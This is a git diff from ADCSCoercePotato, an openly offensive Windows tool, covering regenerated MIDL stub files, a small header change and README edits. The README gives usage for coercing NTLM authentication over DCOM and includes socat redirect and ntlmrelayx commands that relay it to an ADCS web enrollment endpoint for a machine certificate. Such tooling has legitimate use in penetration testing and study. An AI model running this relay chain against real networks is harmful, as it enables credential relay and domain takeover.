+128,11 @@ static const IStandardActivator_MIDL_TYPE_FORMAT_STRING IStandardActivator__MIDL /* this ALWAYS GENERATED file contains the proxy stub code */ - /* File created by MIDL compiler version 8.01.0626 */ -/* at Tue Jan 19 04:14:07 2038 + /* File created by MIDL compiler version 8.01.0622 */ +/* at Tue Jan 19 06:14:07 2038 */ /* Compiler settings for IStandardActivator.idl: - Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0626 + Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 protocol : all , ms_ext, c_ext, robust error checks: allocation ref bounds_check enum stub_data VC __declspec() decoration level: @@ -245,7 +193,7 @@ static const MIDL_STUB_DESC Object_StubDesc = 1, /* -error bounds_check flag */ 0x60001, /* Ndr library version */ 0, - 0x8010272, /* MIDL Version 8.1.626 */ + 0x801026e, /* MIDL Version 8.1.622 */ 0, 0, 0, /* notify & notify_flag routine table */ diff --git a/MSFRottenPotato.h b/MSFRottenPotato.h index 8feb280..cff1f11 100644 --- a/MSFRottenPotato.h +++ b/MSFRottenPotato.h @@ -19,7 +19,7 @@ class PotatoAPI { DWORD startRPCConnectionThread(); DWORD startCOMListenerThread(); int startCOMListener(void); - int triggerDCOM(); + int triggerDCOM(int); SOCKET ListenSocket = INVALID_SOCKET; SOCKET ClientSocket = INVALID_SOCKET; diff --git a/README.md b/README.md index 40efd1d..1392fb1 100644 --- a/README.md +++ b/README.md @@ -6,9 +6,6 @@ ADCSCoercePotato - @decoder_it 2024 Mandatory args: --u Domain Username --p password --d Domain Name -m remote DCOM (ADCS) server address -k redirector where socat and ntlmrelayx is running @@ -17,9 +14,16 @@ Optional args: -n HTTP port where redirector (ntlmrelayx) is listening, default:80 -l local socket server port, default:9999 -c default:{D99E6E74-FC88-11D0-B498-00A0C90312F3} +-u Domain Username +-p password +-d Domain Name +-s session (it seems not working, idk why) Example: ADCSCoercePotato.exe -m 192.168.212.22 -k 192.168.1.88 -u myuser -p mypass -d mydomain.domain On the Linux box (assuming it has IP:192.168.1.88 and the Windows attacker machine is:192.168.1.89) and ADCS web enrollment service is also running on:192.168.212.41 -> socat tcp -listen:135, reuseaddr, fork tcp:192.168.1.89:9999 & -> ntlmrelayx.py -t http://192.168.212.41/certsrv/certrqus.asp --adcs --template Machine -smb2support + +``` +![изображение](https://github.com/MzHmO/ADCSCoercePotato/assets/92790655/26c44476-215e-4722-ae28-96a52ab5154e) diff --git a/dlldata.c b/dlldata.c new file mode 100644 index 0000000..c30c2e7 --- /dev/null +++ b/dlldata.c @@ -0,0 +1,37 @@ +/********************************************************* + DllData file -- generated by MIDL compiler + + DO NOT ALTER THIS FILE + + This file is regenerated by MIDL on every IDL file compile. + + To completely reconstruct this file, delete it and rerun MIDL + on all the IDL files in this DLL, specifying this file for the + /dlldata command line option + +*********************************************************/ + + +#include + +#ifdef __cplusplus +extern "C" { +#endif + +EXTERN_PROXY_FILE( IStandardActivator ) + + +PROXYFILE_LIST_START +/* Start of list */ + REFERENCE_PROXY_FILE( IStandardActivator ), +/* End of list */ +PROXYFILE_LIST_END + + +DLLDATA_ROUTINES( aProxyFileList, GET_DLL_CLSID ) + +#ifdef __cplusplus +} /*extern "C" */ +#endif + +/* end of generated dlldata file */